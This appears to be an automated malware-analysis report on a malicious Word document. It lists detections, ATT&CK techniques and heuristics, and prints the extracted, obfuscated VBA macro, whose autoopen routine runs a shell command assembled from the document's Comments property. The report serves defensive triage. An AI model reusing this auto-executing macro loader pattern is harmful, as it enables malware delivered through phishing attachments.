Verdict: MALICIOUS
Risk Score: 212
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The autoopen macro executes a Shell() call, which in turn references PowerShell. This indicates the macro is designed to download and execute a second-stage payload, likely via PowerShell. The ClamAV detection name 'Doc.Macro.DollarShell' further supports this analysis.
Heuristics (8)
- ClamAV: Doc.Macro.DollarShell-6346616-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.DollarShell-6346616-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script:
  ebbRTBFM = "NVGHZCgRGFN" + "ybzcFWSPbY" + "LfMkfxGd" + "LCCWUdDB" + "ndLygsgbak" + "fmCtWctKhY" + "agmLMdYt" + tFdnZyN = "UcrVbdeVFTW" + "FmrseLA" + "fSRkkBuerGf" + "vcsYTtLsas" + "HRPKERehx" + "KvhFNymkY" + "FBMgLpHZW" + RaDVhAM = "RUMeCZP" + "rFevcgb" + "dBnyFhUPn" + "LgSraHWMnsK" + "WSyECXp" + "MHNgRySGNMU" + "MSRDtwS" + cZPVGvR = "athdtPpxTk" + "tdHAPRvkD" + "WhetKTvXVY" + "RPFsPdv" + "PFbHtBGhH" + "NMBANNwaDds" + "aWYNtrrU" + "BBXNYcWSP" VBA.Shell$ "" + rZCrTyu + gwUYEwFGR + SdCKBWRmm + dPgDectFAEK + zMZyYEh + GChpZzBgR + hkvnTphzVg + SgZmpppR + ActiveDocument.BuiltInDocumentProperties("Comme" + "nts") + rZCrTyu + gwUYEwFGR + SdCKBWRmm + dPgDectFAEK + zMZyYEh + GChpZzBgR + hkvnTphzVg + SgZmpppR + sNhYNbxua, 0 hZvnrDN = "zAEMZgBXATm" + "ZAhxtXm" + "xBCMkTRArZs" + "mcfPrznnKB" + "ztXTTLkrshU" + "BAnrHda" + "BLfMSWdEN" + TAeDWpm = "NEYBPbz" + "dYbUxrTzA" + "bkYNBvcKf" + "aGBNkUbhS" + "FLNYbpdHPzh" + "cUhhPCMMK" + "HppCTmXYAx" + aVNHeGntBc = "uUMbeAYf" + "CwZEARSew" + "zMBsKCF" + "uUmexuzkFwn" + "cpvscrP" + "FbzEWuRyRZX" + "wMMASWhrfC" + fCcAfNvw = "PrgRADKSZKD" + "PNAAMkm" + "MvarReXTzeC" + "frYcTFUe" + "grUpbNyy" + "KvuseXBhC" + "LdRscrpCp" + PbBXTEyXDg = "EXXvpXyv" + "xEdcpyZnERE" + "LUHHCmphpXR" + "S …
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script:
  Attribute VB_Name = "Module1" Sub autoopen() YPBALtUaxa
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4505 bytes |

SHA-256: ca7e6c2321e7ba1e0eaa37212c8e90de603de3cb521eacff84bb170b5bf12673

Detection (macros.bas)
ClamAV: No threats found
Obfuscation or payload: likely. 256 of 307 identifiers look randomly generated (e.g. 'UrYngTuwudm'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub autoopen()
YPBALtUaxa
End Sub
Function YPBALtUaxa()
LXxeuxgW = "WsKaCMuKU" + "pSbWwraCzK" + "vNZECzw" + "GRtZHMUNKxb" + "rDNkdeDH" + "DYnDmzfuZaV" + "RxdZuREUTKd" + KPHsVttxfBg = "RxzkKtCmM" + "sVdsXBppZ" + "zFuyFtSWh" + "LtAYsKBMK" + "SsSyLtfYmy" + "rGVxsLF" + "EcekhReVpLT" + vSNPHwVDHVx = "FyAWuwyU" + "RespRFT" + "czgPUeW" + "BUghykR" + "fYCWeHyS" + "MCDwxvgssMW" + "dKuCNTgWbfs" + bepZFRv = "XtCUWTDrmMv" + "MruufYeUR" + "PymSCENgkWh" + "mNrCGdD" + "gPDYdbBF" + "kwUmUXGMRXn" + "wfGLRRHR" + cmbFMfzX = "mvdTxDArt" + "nFSUzznK" + "gkuLNVz" + "HxNCCTWX" + "CHSvbdbdnyc" + "TRDULTsMGwV" + "BCGCBaK" + mFeewxy = "AUSYGPHwv" + "nBKyVvhfCYP" + "AkRpekv" + "AAPRMUNP" + "BUxhmvKchA" + "VMNkMCHS" + "CgfMeYPhFzW" + "wUGCYgCd"
ZFktLfW = "pguKBuA" + "fczercYgB" + "mBEzKDtCnWW" + "ZCZXyAt" + "BUhKfda" + "CnswDUA" + "zUXuKYSfFxX" + ySmvTnEbFS = "FxfzBuZhcs" + "DwTyMsShaDd" + "VeXfLaK" + "TNZvPrwxXvD" + "VyyRRbg" + "RftYgZS" + "BAxWvmcreT" + TFFystv = "MkYHprk" + "ecZfRBdCmmM" + "fFFVeEfC" + "ELWEXuUw" + "rtkCUtp" + "MPxbtAz" + "wTXBvaZusmZ" + "WAGGhmt"
VadCGdgd = "CtRSuxRLK" + "uZkbYfSR" + "dNXkYwKpF" + "sVKWfWytZ" + "fMaBeHVu" + "UTAaUgZtTXA" + "cLeaWVWhsp" + PePbMHYCp = "fyGPBHu" + "MxCTZzP" + "NEReWKHDRh" + "wPNnDsYUV" + "hyrmXrE" + "TwTFWUvnKYk" + "rsuLVGRZ" + tZBPeMgZgmb = "YzNgyKmzvRx" + "CsUZzDXw" + "ZMKYFckG" + "DXWTRRnCLht" + "mUHPVdbM" + "YKVSwncRTRp" + "KtGHVZbPV" + LdSYNHb = "VMsxhNG" + "XfvYKynMy" + "enUEHYA" + "mGVRSfbZykn" + "frAgyuCFKaB" + "kkbETbt" + "hSCDBhRVrda" + "TNARYcY"
ebbRTBFM = "NVGHZCgRGFN" + "ybzcFWSPbY" + "LfMkfxGd" + "LCCWUdDB" + "ndLygsgbak" + "fmCtWctKhY" + "agmLMdYt" + tFdnZyN = "UcrVbdeVFTW" + "FmrseLA" + "fSRkkBuerGf" + "vcsYTtLsas" + "HRPKERehx" + "KvhFNymkY" + "FBMgLpHZW" + RaDVhAM = "RUMeCZP" + "rFevcgb" + "dBnyFhUPn" + "LgSraHWMnsK" + "WSyECXp" + "MHNgRySGNMU" + "MSRDtwS" + cZPVGvR = "athdtPpxTk" + "tdHAPRvkD" + "WhetKTvXVY" + "RPFsPdv" + "PFbHtBGhH" + "NMBANNwaDds" + "aWYNtrrU" + "BBXNYcWSP"
VBA.Shell$ "" + rZCrTyu + gwUYEwFGR + SdCKBWRmm + dPgDectFAEK + zMZyYEh + GChpZzBgR + hkvnTphzVg + SgZmpppR + ActiveDocument.BuiltInDocumentProperties("Comme" + "nts") + rZCrTyu + gwUYEwFGR + SdCKBWRmm + dPgDectFAEK + zMZyYEh + GChpZzBgR + hkvnTphzVg + SgZmpppR + sNhYNbxua, 0
hZvnrDN = "zAEMZgBXATm" + "ZAhxtXm" + "xBCMkTRArZs" + "mcfPrznnKB" + "ztXTTLkrshU" + "BAnrHda" + "BLfMSWdEN" + TAeDWpm = "NEYBPbz" + "dYbUxrTzA" + "bkYNBvcKf" + "aGBNkUbhS" + "FLNYbpdHPzh" + "cUhhPCMMK" + "HppCTmXYAx" + aVNHeGntBc = "uUMbeAYf" + "CwZEARSew" + "zMBsKCF" + "uUmexuzkFwn" + "cpvscrP" + "FbzEWuRyRZX" + "wMMASWhrfC" + fCcAfNvw = "PrgRADKSZKD" + "PNAAMkm" + "MvarReXTzeC" + "frYcTFUe" + "grUpbNyy" + "KvuseXBhC" + "LdRscrpCp" + PbBXTEyXDg = "EXXvpXyv" + "xEdcpyZnERE" + "LUHHCmphpXR" + "SyuBTBGSG" + "EBfdfaWP" + "MtgxaGC" + "PfxYdtzCWtb" + ZryTTckxYPf = "ZhAyuant" + "gkXhpaH" + "XTYbKbhZGVA" + "tFmhVnR" + "gXKRAers" + "kTHZrxKVBk" + "NGcwzdsLV" + "pDuZtEGx"
nevByfzD = "YyzpDedfr" + "BkUFdGLKEP" + "tZZnVny" + "kVxyDpBUbe" + "BHmmtxs" + "bVTRGXh" + "zWtSrLD" + yAPMvhesKK = "YvzBwVhw" + "WvbDeNRgm" + "HGmxRKpeccm" + "GKEXXuEE" + "EFdUevzfcdu" + "dASKDCw" + "UrYngTuwudm" + YWnXHVmbrSr = "UmBWZzdBLe" + "eWAZhNm" + "uhFcwDBzk" + "nHhgBLCkcKV" + "RZvXMymAw" + "FadhENfdv" + "SsCaYfh" + UwWvTmfR = "brYLsbAwd" + "dfbPcNdGrGa" + "DDZzwbGpbZ" + "RgvUeegFf" + "dZawxtuHYZA" + "svzuRKnVxRt" + "DkwNAKdEk" + ypRNFLz = "SDXbGkD" + "wBcBWbukvMm" + "HPMteNZx" + "VgTWNcbskYD" + "kRWGaGrebrB" + "zTZskDx" + "xXSDNkmk" + "ZkyfVYCCChK"
XKMKrVsuNH = "VWpnWtWz" + "NcvvvbfEx" + "evScFkctbE" + "gLYELnNenFZ" + "MspEUzMd" + "htLHGUXFdH" + "nVKCKsHa" + pLwNywrMpvT = "csFtNHbbnD" + "rfxEpKWn" + "zkKuyCXSLb" + "GCmStsTVCWD" + "CkcAgSN" + "NZFPvNaUt" + "GvrfrndDrSF" + ZSXAkVr = "gWkuMCs" + "kxhkZrYW" + "zvaSnrYuny" + "EmkzbBuax" + "UkvuyXMvzM" + "PUyyWDv" + "YwDLwWtwDhk" + sCdDehrXu = "UcDHkNdgGwS" + "YBhPFwUnkN" + "BCMYsFS" + "uDACKdVt" + "rVeXEAtn" + "ymYBaKA" + "tPxCaGYgcHn" + "vFXwLZecKMt"
mwDRyVaab = "WcWGVZxvbv" + "wLTzkvpWTZ" + "PEWXYXXvD" + "dVtGSfaTDW" + "HXnePFyw" + "vCsvdTNyc" + "MVByGEKXEzc" + mfKAYhzVYL = "VzznTVmW" + "LzxWFuCL" + "mgeVcxVF" + "BZkUkGtsBfC" + "bnTaUYFmsdT" + "ZdeYysxR" + "fDSwgeE" + "PCMpMucuwM"
End Function